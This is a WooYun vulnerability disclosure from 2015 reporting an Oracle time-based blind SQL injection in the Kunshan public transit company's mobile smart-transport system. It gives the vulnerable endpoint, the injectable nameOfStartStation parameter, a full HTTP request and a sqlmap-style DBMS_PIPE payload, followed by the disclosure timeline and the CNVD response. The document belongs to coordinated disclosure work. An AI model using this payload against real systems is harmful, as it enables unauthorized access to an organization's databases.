当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0160059
漏洞标题:
昆山市掌上智能交通系统Oracle注入(涉及18个库)
相关厂商:
昆山市公共交通有限公司
漏洞作者:
无名人
提交时间:
2015-12-16 13:16
修复时间:
2016-01-28 17:10
公开时间:
2016-01-28 17:10
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
11
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

GET /kunshan/ptpSearch.PtpSearchAction.do?CMD=getWapBuildNet&temperature=4%25C2%25B0c%2B%257E%2B5%25C2%25B0c&weatherimg=%252Fweather%252F0.png&state=%25E6%2599%25B4&watch=2015-12-10%2B%25E6%2598%259F%25E6%259C%259F%25E5%259B%259B&nameOfStartStation=1*&nameOfEndStation=1 HTTP/1.1
Host: **.**.**.**:8800
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http://**.**.**.**/composeTransit
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=7B547B567A4D8F524682F6A88AE16B6E; JSESSIONID=nP1X6vMCXLKnvhOfw+RM6qPZ.undefined


nameOfStartStation参数存在时间注入

---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: http://**.**.**.**:8800/kunshan/ptpSearch.PtpSearchAction.do?C
MD=getWapBuildNet&temperature=4%C2%B0c+%7E+5%C2%B0c&weatherimg=%2Fweather%2F0.pn
g&state=%E6%99%B4&watch=2015-12-10+%E6%98%9F%E6%9C%9F%E5%9B%9B&nameOfStartStatio
n=1' AND 7253=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(117)||CHR(107),5)
AND 'SOrT'='SOrT&nameOfEndStation=1
---
[16:16:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

漏洞证明:

1.png

修复方案:

@@

版权声明:转载请注明来源 无名人@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-18 11:38

厂商回复:

CNVD确认所述漏洞情况,已经转由CNCERT下发江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无